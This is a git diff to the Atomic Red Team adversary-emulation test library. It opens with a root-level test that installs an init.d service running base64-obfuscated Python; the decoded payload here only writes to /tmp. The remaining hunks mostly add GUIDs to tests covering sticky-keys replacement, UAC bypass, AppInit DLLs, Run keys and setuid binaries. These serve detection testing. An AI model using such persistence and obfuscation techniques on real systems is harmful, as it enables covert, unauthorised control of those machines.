+        echo Please run from Ubuntu ,Kali OR CentOS.
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      cat > /etc/init.d/T1543.002 << EOF
+      #!/bin/bash
+      ### BEGIN INIT INFO
+      # Provides : Atomic Test T1543.002
+      # Required-Start: $all
+      # Required-Stop : 
+      # Default-Start: 2 3 4 5
+      # Default-Stop: 
+      # Short Description: Atomic Test for Systemd Service Creation
+      ### END INIT INFO
+      python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+      EOF
+
+      chmod +x /etc/init.d/T1543.002
+      if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+      systemctl enable T1543.002
+      systemctl start T1543.002
+
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+      systemctl daemon-reload
+      systemctl restart T1543.002
+    cleanup_command: |
+      systemctl stop T1543.002
+      systemctl disable T1543.002
+      rm -rf /etc/init.d/T1543.002
+      systemctl daemon-reload
+
diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md
index 7dfa0832..7044982f 100644
--- a/atomics/T1543.003/T1543.003.md
+++ b/atomics/T1543.003/T1543.003.md
@@ -27,6 +27,10 @@ Upon successful execution, cmd will modify the binpath for `Fax` to spawn powers
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ed366cde-7d12-49df-a833-671904770b9f
+
+
+
 
 
 
@@ -57,10 +61,14 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 981e2942-e433-44e9-afc1-8c957a1496b6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder&#92;T1543.003&#92;bin&#92;AtomicService.exe|
 | service_name | Name of the Service | String | AtomicTestService_CMD|
@@ -86,7 +94,7 @@ sc.exe delete #{service_name} >nul 2>&1
 ##### Description: Service binary must exist on disk at specified location (#{binary_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{binary_path}) {exit 0} else {exit 1} 
+if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -107,10 +115,14 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 491a4af6-a521-4b74-b23b-f7b3f1ee9e77
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder&#92;T1543.003&#92;bin&#92;AtomicService.exe|
 | service_name | Name of the Service | String | AtomicTestService_PowerShell|
@@ -137,7 +149,7 @@ catch {}
 ##### Description: Service binary must exist on disk at specified location (#{binary_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{binary_path}) {exit 0} else {exit 1} 
+if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md
index cae1c5d4..d3aaeda3 100644
--- a/atomics/T1543.004/T1543.004.md
+++ b/atomics/T1543.004/T1543.004.md
@@ -19,10 +19,14 @@ Utilize LaunchDaemon to launch `Hello World`
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | plist_filename | filename | string | com.atomicredteam.plist|
 | path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist|
@@ -43,7 +47,7 @@ sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
 ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; 
+if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md
index 14d91955..afb4141e 100644
--- a/atomics/T1546.001/T1546.001.md
+++ b/atomics/T1546.001/T1546.001.md
@@ -24,10 +24,14 @@ Upon successful execution, cmd.exe will change the file association of .hta to n
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 10a08978-2045-4d62-8c42-1957bbbea102
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile|
 | extension_to_change | File Extension To Hijack | String | .hta|
diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md
index 0677ca63..4e2640aa 100644
--- a/atomics/T1546.002/T1546.002.md
+++ b/atomics/T1546.002/T1546.002.md
@@ -24,10 +24,14 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 281201e7-de41-4dc9-b73d-f288938cbb64
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_binary | Executable binary to use in place of screensaver for persistence | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md
index 8ea3551c..7bf968e5 100644
--- a/atomics/T1546.003/T1546.003.md
+++ b/atomics/T1546.003/T1546.003.md
@@ -26,6 +26,10 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3c64f177-28e2-49eb-a799-d767b24dd1e0
+
+
+
 
 
 
diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md
index e45a0307..4299c29d 100644
--- a/atomics/T1546.004/T1546.004.md
+++ b/atomics/T1546.004/T1546.004.md
@@ -21,10 +21,14 @@ Adds a command to the .bash_profile file of the current user
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 94500ae1-7e31-47e3-886b-c328da46872f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
 
@@ -50,10 +54,14 @@ Adds a command to the .bashrc file of the current user
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 0a898315-4cfa-4007-bafe-33a4646d115f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
 
diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md
index fc801714..8520cfbd 100644
--- a/atomics/T1546.005/T1546.005.md
+++ b/atomics/T1546.005/T1546.005.md
@@ -18,6 +18,10 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** a74b2e07-5952-4c03-8b56-56274b076b61
+
+
+
 
 
 
diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md
index fb98bab9..04622979 100644
--- a/atomics/T1546.007/T1546.007.md
+++ b/atomics/T1546.007/T1546.007.md
@@ -17,10 +17,14 @@ Netsh interacts with other operating system components using dynamic-link librar
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3244697d-5a3a-4dfc-941c-550f69f91a4d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | helper_file | Path to DLL | Path | C:&#92;Path&#92;file.dll|
 
diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md
index e36b7357..735d996a 100644
--- a/atomics/T1546.008/T1546.008.md
+++ b/atomics/T1546.008/T1546.008.md
@@ -33,10 +33,14 @@ Upon successful execution, powershell will modify the registry and swap osk.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe|
 | attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:&#92;windows&#92;system32&#92;cmd.exe|
@@ -87,6 +91,10 @@ Replace sticky keys binary (sethc.exe) with cmd.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 934e90cf-29ca-48b3-863c-411737ad44e3
+
+
+
 
 
 
diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md
index d0d2cd8b..75e6ea29 100644
--- a/atomics/T1546.010/T1546.010.md
+++ b/atomics/T1546.010/T1546.010.md
@@ -17,15 +17,21 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
 AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, 
 you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
 This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the 
-AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up
+AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
+
+Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a58d9386-3080-4242-ab5f-454c16503d18
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | registry_file | Windows Registry File | Path | PathToAtomicsFolder&#92;T1546.010&#92;src&#92;T1546.010.reg|
 | registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder&#92;T1546.010&#92;src&#92;T1546.010-cleanup.reg|
@@ -49,7 +55,7 @@ reg.exe import #{registry_cleanup_file} >nul 2>&1
 ##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})
 ##### Check Prereq Commands:
 ```powershell
-if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} 
+if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -61,7 +67,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 ##### Description: DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll)
 ##### Check Prereq Commands:
 ```powershell
-if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} 
+if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml
index acaa9658..f5e70f99 100644
--- a/atomics/T1546.010/T1546.010.yaml
+++ b/atomics/T1546.010/T1546.010.yaml
@@ -7,7 +7,9 @@ atomic_tests:
     AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, 
     you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
     This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the 
-    AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up
+    AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
+    
+    Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
   supported_platforms:
   - windows
   input_arguments:
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index d04659d0..d24eac95 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -39,10 +39,14 @@ the source code files is the <PathToAtomicsFolder>\\T1546.011\\src directory.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9ab27e22-ee62-4211-962b-d36d9a0e6a18
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to the shim database file | String | PathToAtomicsFolder&#92;T1546.011&#92;bin&#92;AtomicShimx86.sdb|
 
@@ -65,7 +69,7 @@ sdbinst.exe -u #{file_path} >nul 2>&1
 ##### Description: Shim database file must exist on disk at specified location (#{file_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -76,7 +80,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 ##### Description: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} 
+if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -98,6 +102,10 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** aefd6866-d753-431f-a7a4-215ca7e3f13d
+
+
+
 
 
 
@@ -131,6 +139,10 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9b6a06f9-ab5e-4e8d-8289-1df4289db02f
+
+
+
 
 
 
diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md
index 0387c735..b9ab7202 100644
--- a/atomics/T1546.012/T1546.012.md
+++ b/atomics/T1546.012/T1546.012.md
@@ -27,10 +27,14 @@ Leverage Global Flags Settings
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fdda2626-5234-4c90-b163-60849a24c0b8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_binary | Binary To Attach To | Path | C:&#92;Windows&#92;System32&#92;calc.exe|
 | payload_binary | Binary To Execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
@@ -61,10 +65,14 @@ Leverage Global Flags Settings
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_binary | Binary To Attach To | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
 | payload_binary | Binary To Execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md
index ddd23f09..dadf2820 100644
--- a/atomics/T1546.013/T1546.013.md
+++ b/atomics/T1546.013/T1546.013.md
@@ -21,10 +21,14 @@ Appends a start process cmdlet to the current user's powershell profile pofile t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 090e5aa5-32b6-473b-a49b-21e843a56896
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_path | Path the malicious executable | Path | calc.exe|
 | ps_profile | Powershell profile to use | String | $profile|
@@ -51,7 +55,7 @@ Set-Content $profile -Value $oldprofile
 ##### Description: Ensure a powershell profile exists for the current user
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{ps_profile}) {exit 0} else {exit 1} 
+if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md
index 1e5dbb49..bb146717 100644
--- a/atomics/T1546.014/T1546.014.md
+++ b/atomics/T1546.014/T1546.014.md
@@ -19,10 +19,14 @@ Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at st
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 23c9c127-322b-4c75-95ca-eff464906114
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | plist | Path to attacker emond plist file | path | PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist|
 
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index 3df5043a..8db87797 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -67,10 +67,14 @@ Upon successful execution, cmd.exe will modify the registry by adding \"Atomic R
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e55be3fd-3521-4610-9d1a-e210e42dcf05
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.exe|
 
@@ -102,10 +106,14 @@ Upon successful execution, cmd.exe will modify the registry to load AtomicRedTea
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 554cbd88-cde1-4b56-8168-0be552eed9eb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.dll|
 
@@ -136,10 +144,14 @@ Upon successful execution, a new entry will be added to the runonce item in the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** eb44f842-0457-4ddc-9b92-c4caa144ac42
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | powershell.exe|
 | reg_key_path | Path to registry key to update | Path | HKLM:&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;RunOnce|
@@ -173,6 +185,10 @@ folder and will also run when the computer is restarted and the user logs in.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2cb98256-625e-4da9-9d44-f2e5f90b8bd5
+
+
+
 
 
 
@@ -208,6 +224,10 @@ folder and will also run when the computer is restarted and the user logs in.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dade9447-791e-4c8f-b04b-3a35855dfa06
+
+
+
 
 
 
@@ -242,6 +262,10 @@ folder and will also run when the computer is restarted and the user logs in.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5b6768e4-44d2-44f0-89da-a01d1430fd5e
+
+
+
 
 
 
@@ -274,6 +298,10 @@ Adds a non-malicious executable shortcut link to the current users startup direc
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 24e55612-85f6-4bd6-ae74-a73d02e3441d
+
+
+
 
 
 
diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md
index 5fe2f423..da6f3b0d 100644
--- a/atomics/T1547.004/T1547.004.md
+++ b/atomics/T1547.004/T1547.004.md
@@ -29,10 +29,14 @@ Upon successful execution, PowerShell will modify a registry value to execute cm
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bf9f9d65-ee4d-4c3e-a843-777d04f19c38
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -64,10 +68,14 @@ Upon successful execution, PowerShell will modify a registry value to execute cm
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -99,10 +107,14 @@ Upon successful execution, PowerShell will modify a registry value to execute at
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d40da266-e073-4e5a-bb8b-2b385023e5f9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | binary_to_execute | Path of notification package to execute | Path | C:&#92;Windows&#92;Temp&#92;atomicNotificationPackage.dll|
 
diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md
index 3b89b849..92db61ec 100644
--- a/atomics/T1547.005/T1547.005.md
+++ b/atomics/T1547.005/T1547.005.md
@@ -17,10 +17,14 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:&#92;Windows&#92;System32. | String | not-a-ssp|
 
diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md
index cff18b2b..ca56ae7e 100644
--- a/atomics/T1547.006/T1547.006.md
+++ b/atomics/T1547.006/T1547.006.md
@@ -21,10 +21,14 @@ This test uses the insmod command to load a kernel module for Linux.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 687dcb93-9656-4853-9c36-9977315e9d23
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | module_name | Name of the kernel module name. | string | T1547006|
 | module_path | Folder used to store the module. | path | /tmp/T1547.006/T1547006.ko|
@@ -51,7 +55,7 @@ sudo rmmod #{module_name}
 ##### Description: The kernel module must exist on disk at specified location
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{module_path} ]; then exit 0; else exit 1; fi; 
+if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md
index 42a377fa..bbda29b0 100644
--- a/atomics/T1547.007/T1547.007.md
+++ b/atomics/T1547.007/T1547.007.md
@@ -21,6 +21,10 @@ Plist Method
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 5fefd767-ef54-4ac6-84d3-751ab85e8aba
+
+
+
 
 
 #### Run it with these steps! 
@@ -49,10 +53,14 @@ Mac Defaults
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 5f5b71da-e03f-42e7-ac98-d63f9e0465cb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script | path to script | path | /path/to/script|
 
diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md
index c2f26034..3e405cac 100644
--- a/atomics/T1547.009/T1547.009.md
+++ b/atomics/T1547.009/T1547.009.md
@@ -21,10 +21,14 @@ Upon execution, calc.exe will be launched.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ce4fc678-364f-4282-af16-2fb4c78005ce
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | shortcut_file_path | shortcut modified and execute | path | %temp%&#92;T1547.009_modified_shortcut.url|
 
@@ -57,6 +61,10 @@ to view the new shortcut.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cfdc954d-4bb0-4027-875b-a1893ce406f2
+
+
+
 
 
 
diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md
index 60ed62c2..4af13b5c 100644
--- a/atomics/T1547.010/T1547.010.md
+++ b/atomics/T1547.010/T1547.010.md
@@ -24,10 +24,14 @@ Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d34ef297-f178-4462-871e-9ce618d44e50
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | monitor_dll | Addition to port monitor registry key. Normally refers to a DLL name in C:&#92;Windows&#92;System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. | Path | C:&#92;Path&#92;AtomicRedTeam.dll|
 
diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md
index e18c5b40..f39ea804 100644
--- a/atomics/T1547.011/T1547.011.md
+++ b/atomics/T1547.011/T1547.011.md
@@ -19,6 +19,10 @@ Modify MacOS plist file in one of two directories
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 394a538e-09bb-4a4a-95d1-b93cf12682a8
+
+
+
 
 
 #### Run it with these steps! 
diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md
index 5cee87b3..7286cc60 100644
--- a/atomics/T1548.001/T1548.001.md
+++ b/atomics/T1548.001/T1548.001.md
@@ -23,10 +23,14 @@ Make, change owner, and change file attributes on a C source code file
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 896dfe97-ae43-4101-8e96-9a7996555d80
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | payload | hello.c payload | path | PathToAtomicsFolder/T1548.001/src/hello.c|
 
@@ -62,10 +66,14 @@ This test sets the SetUID flag on a file in Linux and macOS.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 759055b3-3885-4582-a8ec-c00c9d64dd79
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary|
 
@@ -97,10 +105,14 @@ This test sets the SetGID flag on a file in Linux and macOS.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** db55f666-7cba-46c6-9fe6-205a05c3242c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary|
 
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 597dc756..81999488 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -40,10 +40,14 @@ Upon execution command prompt should be launched with administrative privelages
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -75,10 +79,14 @@ Upon execution command prompt should be launched with administrative privelages
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a6ce9acf-842a-4af6-8f79-539be7608e2b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -111,10 +119,14 @@ Upon execution, "The operation completed successfully." will be shown twice and
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 58f641ea-12e3-499a-b684-44dee46bd182
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
